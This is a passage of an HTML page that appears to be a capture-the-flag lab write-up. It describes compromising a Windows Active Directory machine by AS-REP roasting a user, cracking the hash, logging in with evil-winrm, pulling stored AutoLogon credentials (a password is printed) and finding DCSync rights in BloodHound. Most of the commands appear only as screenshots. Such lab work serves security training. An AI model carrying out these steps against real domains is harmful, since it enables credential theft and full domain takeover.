class="gatsby-resp-image-image" alt="users list" title="" src="/static/067f0c33f1a3e753b81c906aec81528a/c9d3d/users-list.png" srcset="/static/067f0c33f1a3e753b81c906aec81528a/dda05/users-list.png 158w, /static/067f0c33f1a3e753b81c906aec81528a/679a3/users-list.png 315w, /static/067f0c33f1a3e753b81c906aec81528a/c9d3d/users-list.png 370w" sizes="(max-width: 370px) 100vw, 370px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">GetNPUsers.py</code> from <a href="https://github.com/fortra/impacket" target="_blank">Impacket</a> with the specified list of usernames:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/fb5f01d9049e4def132d0036555176bd/5458a/GetNPUsers.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 22.78481012658228%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABEklEQVR42j2Pa26DMBCEc5aQVCI8jTHGBMwrOCFp1VZp73+U6eBI/TFaa/V5dmYXyAcO6hv7dETZXNBPH+iGB/UOVc84hApBVOMYG7wljdeR2scaAXdh3iHMWhzIBCeNXWG/kDYPJNpBt3dM7olheWK8/mJwP9A8InSPpOjQDisZB8FD+fmKqBpRGEct/tA+rGioRkg1IZMTROWQlhMiMSCvFqSFhTIzZH2B5EdjV3Id4qxGKnvkekZEJqtmxOUA2Tga8qMyN2TlzMorCr283uYKUVrobvWgtnec50+mW7xZIhomn7ypam/edGN2iegJMFW2TV4qBpz+d8aD6daAc6uW0OwkLMWkomUby1Yjk74S/wFH8aUqhDIRDQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="GetNPUsers.py" title="" src="/static/fb5f01d9049e4def132d0036555176bd/50637/GetNPUsers.png" srcset="/static/fb5f01d9049e4def132d0036555176bd/dda05/GetNPUsers.png 158w, /static/fb5f01d9049e4def132d0036555176bd/679a3/GetNPUsers.png 315w, /static/fb5f01d9049e4def132d0036555176bd/50637/GetNPUsers.png 630w, /static/fb5f01d9049e4def132d0036555176bd/5458a/GetNPUsers.png 758w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>A hash was retrieved for the <code class="language-text">fsmith</code> user due to this account not requiring Kerberos pre-authentication:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b7980e882e0847bbd3230254985daf00/9fe72/fsmith-hash.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 23.417721518987342%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABFElEQVR42i1Q4XKCMBjjcTa9gQIVECiUAm0dysQhm+//Hlng9iOXXr58X3Px4rRHnPQ4ig4icziIFodThzAziAhxNpwppNIhSjWCsMBHkFGrEVCPc0O/3jg4NfBkM2JFqb5Q6wlV90Be31A2d8h2Qq5GFMR500bOJ0h9Q1FdUJGVWT1XFHpEUjp4vXuiNd9o7Qz7+Ut+onMLWvdDLDDXF8zwi8bM6Mn29kJ74c5lhrYTPQ90w7Kh5Aeepan7P+LWZR51wwvaLGj6eUu6pl/TlkxRMGVWDRuXisx0WT1wfkfCWjyRWURJS3RIzhbhiW92KFJ2I9hZ1MA/KvbXw48VdgeJN7/APqzw7ufUauyOEj773IcSf74asMDnvUy0AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="fsmith hash" title="" src="/static/b7980e882e0847bbd3230254985daf00/50637/fsmith-hash.png" srcset="/static/b7980e882e0847bbd3230254985daf00/dda05/fsmith-hash.png 158w, /static/b7980e882e0847bbd3230254985daf00/679a3/fsmith-hash.png 315w, /static/b7980e882e0847bbd3230254985daf00/50637/fsmith-hash.png 630w, /static/b7980e882e0847bbd3230254985daf00/9fe72/fsmith-hash.png 755w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I saved the ticket in a file called <code class="language-text">hash.txt</code> and used <code class="language-text">JtR</code> to crack the password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f2c65706a9a0986f816282db5c7ae2da/44507/as-rep-crack-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 49.36708860759494%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB+0lEQVR42jVSWXbiMBD0URIgMV5YDbItyba8sYMJMGHem7n/NWrKIvNRr1pSq1TdaseNWgTJA6L6i3m8RVqcIc0FWXWFUHuM3CWGxIcvMPLXhMBHmGIUvPA5kXb92kvg6OqGorljf/6Dqn2g3DyQ1V/EFWZztyzzA7LySN5DG8ZmzzW5vqDaM7+5QjNOzRlORjeGAqa5kW9odk/k5Hr3TcHXA83hN8rtw6I5PC1XbYe8OvFeR9Ff3LtTtINj6KDZUIhJNR21FKy331bY0HlfuuKjOR+VbIeiC1VeLDRdK3Nkm0502dHhCU6wahGmNyz0Ayu5Q96wXLot2juS/IxhIDHwUot3L8bATxjHeHcF3j6XRIS38RrvP3CW8gRh7izvCUWBJD9S8Mv2RTCeihpBVGKyJq9KhOuSbOAvcvizDP5c29idKniMnay3Tsua5WRlx6Z3SNQBgm79aYZgxmRfWvYJjyI9AoqEUYFJZMgG45lGsCz4y9kOSrVQmkxHhr+n9RZxXCJNa6RJDSkbCK5FUiKRdMrLA5cjxNJHbMHQj+3I2LEpyhPFNkxuEcUtJOM4abjHmZStPdMcm1T13D+6wzrdIGLOgu2YLOlw+XI6YSucmMO7YH9ivceKoh7LHIf6Vd5Eww2VZf9/qfPCcjjvzxWGY4EhnfYuB57AP4ECUtiS+hnmAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="AS REP crack password" title="" src="/static/f2c65706a9a0986f816282db5c7ae2da/50637/as-rep-crack-password.png" srcset="/static/f2c65706a9a0986f816282db5c7ae2da/dda05/as-rep-crack-password.png 158w, /static/f2c65706a9a0986f816282db5c7ae2da/679a3/as-rep-crack-password.png 315w, /static/f2c65706a9a0986f816282db5c7ae2da/50637/as-rep-crack-password.png 630w, /static/f2c65706a9a0986f816282db5c7ae2da/44507/as-rep-crack-password.png 750w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">evil-winrm</code> established a connection as <code class="language-text">fsmith</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f63fab01df0e3e28f3ebd959385d037c/44507/evil-winrm-fsmith.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.177215189873415%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABWElEQVR42mXR0XLaMBCFYT9KwYAtydiyLMkWBpPEEBKSdNq+/7v8XUI7zUwvvjlaXexIu1lhn9h0H6yFdo9MTz84zj+ZTr+I6YQxjnWV0PXNgBIr3ZOLlY6f56+yvH5maa/k9o28njHdRcxs7ANFfWBdOL4VHYWJqCpQVpFFKVTPQg/3/CLb+8gkbjl2PTvnGZ0jSYbWMwXPYC1b09BUlnZb47cVtpJsHX3n8S4QRCey0NyaRKLtSe3A0ScGN9C7JA0To9StHSnNTl54p2UEpQoo5dGmR213fyQyY84oc7rTJypzYaMfWZUH8nJirR6klu/rg+ReGt8cKCqhktzvZByj1Hs2klkrS+nsTApnQnqhG7/TxFdxoemvbMMLVbxSuZlFEViq+E/pWcp8l7Kcm1xkfXtkkOEf/cQ4nkiHd1ycCcMzvj/Lpi9y98a6HMhl6P8pw+fG//oN8SXdnkA5C7YAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm connection as fsmith" title="" src="/static/f63fab01df0e3e28f3ebd959385d037c/50637/evil-winrm-fsmith.png" srcset="/static/f63fab01df0e3e28f3ebd959385d037c/dda05/evil-winrm-fsmith.png 158w, /static/f63fab01df0e3e28f3ebd959385d037c/679a3/evil-winrm-fsmith.png 315w, /static/f63fab01df0e3e28f3ebd959385d037c/50637/evil-winrm-fsmith.png 630w, /static/f63fab01df0e3e28f3ebd959385d037c/44507/evil-winrm-fsmith.png 750w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, to check for any possible paths to escalate privileges, I transferred WinPEAS onto the machine and ran it:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a2da9b338b7ac3ff58e7e7e7ae1a5a30/15d18/upload-winpeas.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 19.62025316455696%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAvUlEQVR42k3Paw6CMBAEYK6iFKWlD0CUhyCCBE2M9z/OOFQ0/vgy3Wx3kw2UqmBkhUyXsIcWtpzhKK3v3vLWxQ2umpGxzik5DAh1Q7VPwfSSGkGUPbAQbmbzgtD0q6snzODr7ZKaqVtmC2F7L/pnOgSSQ5KfpRkRc2DPpfvkjJh2qmG2iHjFJi6wlcdfhmrFt/hiHWgOuqRDbjukxcjTnjxzQlreaII7jVAZ+80MexzQDC/WF79UqBOXfojVG7Vmfg8YP/AQAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="upload winPEAS" title="" src="/static/a2da9b338b7ac3ff58e7e7e7ae1a5a30/50637/upload-winpeas.png" srcset="/static/a2da9b338b7ac3ff58e7e7e7ae1a5a30/dda05/upload-winpeas.png 158w, /static/a2da9b338b7ac3ff58e7e7e7ae1a5a30/679a3/upload-winpeas.png 315w, /static/a2da9b338b7ac3ff58e7e7e7ae1a5a30/50637/upload-winpeas.png 630w, /static/a2da9b338b7ac3ff58e7e7e7ae1a5a30/15d18/upload-winpeas.png 752w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The script found the <code class="language-text">svc_loanmanager</code> user with AutoLogon enabled. AutoLogon stores credentials on the system, and in this case, they were able to be discovered:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 583px; " > <a class="gatsby-resp-image-link" href="/static/b5518da031be6235b1ce77446b498a2c/d8a90/autologon.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 17.72151898734177%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA6UlEQVR42mWQy06DUBRF+RIjxfISSnmWx+VVChREBzrQxIQ49v/nyysD08TByj7JPtkn+yh3+Rv38cKDX6KLFj1tMMICS/RY9RWzGjDSFrMd0euBvfRVO2JnJ2j26R/KJegQfsPoC/qwpIoErRkirIDUyygliZMyODXhscM8dNiWPGBXqGYkif/YWQnKvLxzHl6Znj9YXj4pxICmB2hGtLGXS49uLQO/uDgr3WFl9r7pg5Ww6Amygax+4lTNeMkZJS4mgrQnyq8kYsZwc9TfwJsapieIhfTLadMoHzfNmoW0nrfZPsqXuTk/DtGDXzvQnmYAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="WinPEAS output AutoLogon" title="" src="/static/b5518da031be6235b1ce77446b498a2c/d8a90/autologon.png" srcset="/static/b5518da031be6235b1ce77446b498a2c/dda05/autologon.png 158w, /static/b5518da031be6235b1ce77446b498a2c/679a3/autologon.png 315w, /static/b5518da031be6235b1ce77446b498a2c/d8a90/autologon.png 583w" sizes="(max-width: 583px) 100vw, 583px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">svc_loanmanager</code> wasn't a user on the system, but there was a user named <code class="language-text">svc_loanmgr</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f03da33a01ed39b64572db001a0b5d51/c251d/winpeas-user-info-svc_loanmgr.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 68.9873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB2ElEQVR42n2T6XKbQBCEeRIHcZgFcYnlWG4Eso7YilOpJO//Jp1GiV2OC/SjC3aL+bZnmtW8XQs/GxDwGSYtnw3CXf0uPyrf3yNK8BtDdjCXlDTQFEH9/gpVn1hcwxYpHt0MUdKhGb5CZj2El3EvhSckIpHA4NpakVbEDbrDK/L2AtMrYG4LGL5CzIOaYoQdVbC2+Q3iUKErYXBtrUjL4xb19A2xOkAXcyGBWwXBg3y2YQUlHDp32K7Dghlo3gO2dHKaXjGOV0jZw6dDV2SICaw4hrp+glITuu6CHQviuWW/WAcGLEyqJ0TpgDjbI6Cr7eyOB0XpHuEcGPfCtGcwDVw6NWTLEBY0h6JHDb4EFXQ3h+7l2NDhhi3P0tn+R8175uzO/+DKz/9ba7o8QlcvMMszHDXCKSfYYQ1TzKkVC1qf319gdsJD9YwNQ7HzAXZ9hM2ZWfxtTLq+Jf9J98DaRk7Qywv0fA8j4CbnaOUj57EONN+AC9L0gu6Gn7D7K8RwpM4QLV0yjDXYXaDFQNyXH/C+/6J+QxyvsOL6VmT80zp4CcjrlHUTysMZ1XRBXI5IA4XEkZBOipDh3AN+hmoe7+1U8D4rKqvQ873gFbN5a1zO8PHOHJegfwBBObWwMc3+3QAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="winPEAS user info svc_loanmgr" title="" src="/static/f03da33a01ed39b64572db001a0b5d51/50637/winpeas-user-info-svc_loanmgr.png" srcset="/static/f03da33a01ed39b64572db001a0b5d51/dda05/winpeas-user-info-svc_loanmgr.png 158w, /static/f03da33a01ed39b64572db001a0b5d51/679a3/winpeas-user-info-svc_loanmgr.png 315w, /static/f03da33a01ed39b64572db001a0b5d51/50637/winpeas-user-info-svc_loanmgr.png 630w, /static/f03da33a01ed39b64572db001a0b5d51/c251d/winpeas-user-info-svc_loanmgr.png 751w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Attempting to make a connection with <code class="language-text">evil-winrm</code> with the username <code class="language-text">svc_loanmgr</code> and password <code class="language-text">Moneymakestheworldgoround!</code> successfully authenticated:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9860e47c5c61fb274430efe962d3f467/adb42/evil-winrm-svc_loanmgr.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.810126582278485%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABV0lEQVR42m2RSXKDQAxFOUowGAdoaHoeANtgO4O9iquS+9/kR+AkqyxefZWk/iqpk0LPKPwHtuGO0p4wvd1xuX1hvn4iHm/gMoILh4IHMBEgpUcnHQTR/cQFs8hriy2RpM2MtD0j5SekzQEp2yOtIp5KTzhkladmj4zImcf2h4I57BpHMfWQ0aZ6kETJMRqFwVlEYzBYjb2V6LWGlQajVeiNBucGojNQlNNSQ4iHOq1WtUpTTSPRDT3uFLyKCLrH0Q1kEuFUgJEBg4nwlC+bAVXTo15oHzEjbfiicaVqA5JdecSuPKCop5VndqJbTLTGgE09Entk7EC5AXkZqCdS3K8UxG6BRWKpkWEnZnQ03XQ9lD1AhFcootETRH9DF6/g4YrWXtCaI93J/d3rl6wyD2pDK3Myo18azYjQT3DjFX58QSsi5DLAnyHsTPl3FLTWYpj9Q07GC9/bA969vg4Y0AAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm connection as svc_loanmgr" title="" src="/static/9860e47c5c61fb274430efe962d3f467/50637/evil-winrm-svc_loanmgr.png" srcset="/static/9860e47c5c61fb274430efe962d3f467/dda05/evil-winrm-svc_loanmgr.png 158w, /static/9860e47c5c61fb274430efe962d3f467/679a3/evil-winrm-svc_loanmgr.png 315w, /static/9860e47c5c61fb274430efe962d3f467/50637/evil-winrm-svc_loanmgr.png 630w, /static/9860e47c5c61fb274430efe962d3f467/adb42/evil-winrm-svc_loanmgr.png 741w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I used <code class="language-text">bloodhound-python</code> to collect AD data and get a better idea of the environment:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/46ea5bf8a3e378f34a2a673b223aeb62/e555d/bloodhound-python.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 60.12658227848101%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACNUlEQVR42mWTaZLaQBSDfZQM4H3Hu93ejVkGCCSV+x9FUfeQqUnyQ9VdUHytpyc0ez/CKJ4wyx/wixViuqNb7hjWB5rphun0C9P6k/fvCNMerp/DD3IYTgbfTxEEKfwwRxhXcIMSWtUckFQrqu6MfjyjFgc0YkFZTYiyEVlzgh/3eDNTbM0EupXAsBNsrBQ6T8OMsdN9fraH4RE48PWOrzfDDWV35Xmnywey+oQ4n5HysUKckBQLgmTkIxP8ZECw7+AENdxQquF3PaxQQOuXJ/rlgX5+YJR3nnX3jqa/omwvdP5O4FkpSkcFMp0CWyvHzi6xcyqqpntOoIcE0k033hWoY34DoWEyKSdRNsMJW9hBA8uv4fHuRj10CbBKbG2pChvCNnrEew6t5pg1nShXvOcc1QlaSsCLO44yqAw9gvx44Dl8AO0vQCNWsK3DDAWzq15ACXZ8gTc9/U/fdnRhZFROR8XfQF0COTLHVxm20/0zO+k4Tic66Rh2q9y6Yacc6jIvOernuC+ZGR8Nec9khoRNV4zzDQd2TuYZcZuVuCArj0jLVcVQNmf2rOWPC9al+gdaKah0qhnMSg9X6sgF9IQcVEUy1iXOFuzzBUl+YIUWLkeosSV0YxTsJk/rpRdcSwQX0T4RFWcCZhb7otxIYNPfuHlG0TIK1kjCLY+d478rTGYubaQGuJTpCQXWRHfBMN7UQgTzawkpqiMCblZ2UNZKji97KfOVWZpurZZneR+SsD9V+g333IeNlNjLGAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="bloodhound-python" title="" src="/static/46ea5bf8a3e378f34a2a673b223aeb62/50637/bloodhound-python.png" srcset="/static/46ea5bf8a3e378f34a2a673b223aeb62/dda05/bloodhound-python.png 158w, /static/46ea5bf8a3e378f34a2a673b223aeb62/679a3/bloodhound-python.png 315w, /static/46ea5bf8a3e378f34a2a673b223aeb62/50637/bloodhound-python.png 630w, /static/46ea5bf8a3e378f34a2a673b223aeb62/e555d/bloodhound-python.png 747w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After importing the data into <code class="language-text">bloodhound</code>, the Find Principals with DCSync Rights query showed that <code class="language-text">svc_loanmgr</code> had DCSync on the domain:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/0083d768e85df7ba7f5ecc9657398c3e/6f2d0/find-principals-with-dcsync-rights.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 80.37974683544303%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACMElEQVR42pVTy3LaQBDkd5KAMSBAj9X7hRYBguCy41Qllcotp+T/D5PuEajKDq4kh9FKq52e7p7Z0d0qkskyvISRezcSxxRiiq1E5U5MvhU/ayTIre65yWY4z9zXMeJjFZbip1aCrJT9w0ns8Vk8JPLfzEv1v5vUsuQ5AIdFKws/uwmqgHP8XILVMizAMNWE9uOz1PsHMLSyiioNMvTTRtZxrexvgY56yUbGDmLhKcsAMlmEILk9aXJc71X6Oq60IK3g3r2bIP8VoJ9Rxk6iqpHtsQOzRzD8JNXurElxtZeyPes3vXTBMK52ukfWEyd8CciYrrnGYBpJePGJvq3BkhL5nTadAlL2KioVdHf+rGqu0gcPZ4i5F4FFK0ndaQMck+tKmdeuB1CT26MU25Mkm4N0j1/Edk/ybu6DVCwjPliRB01hcWgrWXPSJC/dKCDjOjb0jmsJ+WT39fsP+fbzl0zWYLi8MByD7odFgDC6vke1GczmuLD77CbHyENTCM5mkT2D/iZth7UVJ8h7wEWQiRvBr7SUHE2xhyf1SwExSvSLjehHqwfkyqI6JU44dHrwkD65rBzkQ3W+E0gDDfJhAYvw/K1bMgBS8hhyaezcpOonG0CgBUAZ9I7Mpper+iYgqWoXkeDlGwmtlbQ+DD6xYby//QC/DfSC4cxL9M72UmKVlcFDFuH+mB79BejGYMdyh+sXwqcEYD2Q+SdWfwASLMBIGESEWeSdJeD0P4CugL8BWqwjiTTH144AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Find Principals with DCSync Rights" title="" src="/static/0083d768e85df7ba7f5ecc9657398c3e/50637/find-principals-with-dcsync-rights.png" srcset="/static/0083d768e85df7ba7f5ecc9657398c3e/dda05/find-principals-with-dcsync-rights.png 158w, /static/0083d768e85df7ba7f5ecc9657398c3e/679a3/find-principals-with-dcsync-rights.png 315w, /static/0083d768e85df7ba7f5ecc9657398c3e/50637/find-principals-with-dcsync-rights.png 630w, /static/0083d768e85df7ba7f5ecc9657398c3e/fddb0/find-principals-with-dcsync-rights.png 945w, /static/0083d768e85df7ba7f5ecc9657398c3e/6f2d0/find-principals-with-dcsync-rights.png 1021w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The help info showed the two privileges that allow a DCSync attack to occur, DS-Replication-Get-Changes and DS-Replication-Get-Changes-All:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 598px; " > <a class="gatsby-resp-image-link" href="/static/9803a3cf95a961645cd3018d6ccedd27/89d5f/dcsync-info.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 47.46835443037975%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABnElEQVR42o2R207bQBCG9wmQwIVyTBzixOtDsOM4m/gUOxCbRKgJoa0oai/7AH2LPvbfmRWhFKkSF59m/pmdmd1ZUX96RHP/HfXmCc32B8rlZ8ya7Qvl7cM//l/e6gcs7r5CmPYQ510fJ6YLe1hgtvqG6o55wrhaw58uUSwftY5Jy3gBNb9HSee8yS0cVVN8g6z5Alc1EK1+iB0dGUNSUzcq4BD9IIM1SGCTdaKZ9i+9CXpXKeww19ryE/RJs9+metF1xxjnNcLJHIN4BkV+Wi2RVCtEyTXlFtqO0hvETHaDQFWIpnOootbnuN4f5TDOehBOmKFs1kjmK7jDDBe9AF1vDMtTaNM6mN5gAlNGOsY5jrHly3TkCLw2tse0NmGS448KyDDFlSrpufS8kJ8xhUdT7SCBF+XUVFE8hQxSrY9aDvZPLByc9TUfzm2NOLyQ+Nh2CYcmePQ5ntbsv+Yl9myPWhJcyxycWtg7NGHQALHrzBg0yXg17S27nPGsudn+8SXsfI3Nr9+QZMX/it8F345uZYYVku1PdMIKfwC5ixbUnMF2mQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="DCSync Info" title="" src="/static/9803a3cf95a961645cd3018d6ccedd27/89d5f/dcsync-info.png" srcset="/static/9803a3cf95a961645cd3018d6ccedd27/dda05/dcsync-info.png 158w, /static/9803a3cf95a961645cd3018d6ccedd27/679a3/dcsync-info.png 315w, /static/9803a3cf95a961645cd3018d6ccedd27/89d5f/dcsync-info.png 598w" sizes="(max-width: 598px) 100vw, 598px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This could also be seen by viewing First Degree Object Control for <code class="language-text">svc_loanmgr</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 472px; " > <a class="gatsby-resp-image-link" href="/static/e5996a90ec85184557aff6f52aa8bdda/1b0b6/svc_loanmgr-first-degree-object-control.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 134.17721518987344%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAbCAYAAAB836/YAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC8ElEQVR42qVVW28SURDmwfjik/HRl9bSUoQFFlh2S6FcyqXcuuVeLksvQFtsa9uo0TQxURNj0kQT4yX+A3/m58zZtqkGZYsPw7J75nxnvvlm5tg8oRVMNDVmmgVf2yQHLwHJgShc8hIkJfp/gAzmIZAHUQ2FRh1qOA5XMDIdoETmlsN46JFx5/sL3H/ew6LDB4kO+VekYwF9WhxeLYZUoYoPF5+wPOjCvpZCUEtAjWUhLyXEgZYAmabDq6Gzs4+Xr9/h7fsLnJ+/wcHoFIk1HWt6A+FEDu6/ULeNA8uXNwWgXjeQzJeRLFSQKzex4AnBTXQtUWawx/4w4lkd/dGJ+MZP3qw3DBSrbThJaZEOK6LwRgbdP34mNqxSZK2tIWacsglYaWPRp5nKTwJkJ3autXeIZhcziz4Y/RFFuw67O4h1+sYROqwCXhlTZEpMnQG1eBbzUgilWofMIuB17kjBpjEQoiiRFHqDJ/CHk/SuCkC90RVrlgD55GKlhSpRdgWWEVrJYO/oDEuXEW40ezDogAWPag2Q88el0t7eEx+DFCGLs5zMwy4pqLS2sLN/LMrGp00CpB+OKpIqoEWATJ83McBKukSiKEKUemcXC17VuijuYBQDEoXbivPWGx6KjpinCAuUDs6jpRxedwjRLlOu2Lj2GkYf2fUaHrkCKFHJmKKotysbtiGJwVFyCljpWaf/hsq3AGRHpxwWxTw8PBNC9UdPxRoLNlWEV4pzRJvUdvmNpshfplQT7Wc5h3/OQgZlgN2DEzR7A+T0JjbqvelyaILGxGRJF6v4/PUHPn77An88BncgOh0gm0yR2r0KjMYQxs9t2HJ34ZhT4KN7xRO6xRXAk5iNi53fZ+e8sB3dw6vTJFqBJOao8KVLn3FT+7d5GKBhkC7WxKjn7uAJoze7SBbLOKy20KlsYpXWi/Q/RVM8QymZqDL3sRJNk5lPNZZBiJ4SHSaLNdPYj20iZenyznDfoCWokV1RlZSIaNVxd8svUOabHB13NvcAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="svc_loanmgr First Degree Object Control" title="" src="/static/e5996a90ec85184557aff6f52aa8bdda/1b0b6/svc_loanmgr-first-degree-object-control.png" srcset="/static/e5996a90ec85184557aff6f52aa8bdda/dda05/svc_loanmgr-first-degree-object-control.png 158w, 